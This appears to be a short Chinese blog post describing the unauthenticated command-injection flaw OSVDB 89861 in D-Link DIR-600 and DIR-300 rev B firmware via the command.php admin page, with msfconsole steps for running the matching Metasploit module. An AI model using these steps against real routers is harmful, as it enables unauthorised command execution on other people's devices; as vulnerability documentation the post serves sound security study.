美文网首页
D-link路由器OSVDB(89861)漏洞

D-link路由器OSVDB(89861)漏洞

作者: 老王和坑坑 | 来源:发表于2018-07-26 12:00 被阅读0次

    简述

    D-Link 生产的DIR-600和DIR-300系列路由器的rev B固件存在系统命令注入漏洞。该漏洞编号为OSVDB(89861)。

    产生位置

    改漏洞允许用户在未授权的情况下,通过路由器管理后台的command.php页面,执行系统命令

    利用方法

    在Metasploit中已经集成的此漏洞利用模块
    模块名:dlink_dir_300_600_exec_noauth
    位置:auxiliary/admin/http/dlink_dir_300_600_exec_noauth

    msf > use auxiliary/admin/http/dlink_dir_300_600_exec_noauth
    msf auxiliary(dlink_dir_300_600_exec_noauth) > show options 
    #...
    # set 一系列option
    #....
    msf auxiliary(dlink_dir_300_600_exec_noauth) > run # 运行
    
    

    利用改模块可以执行任意的系统命令

    相关文章

      网友评论

          本文标题:D-link路由器OSVDB(89861)漏洞

          本文链接:https://www.haomeiwen.com/subject/xttbmftx.html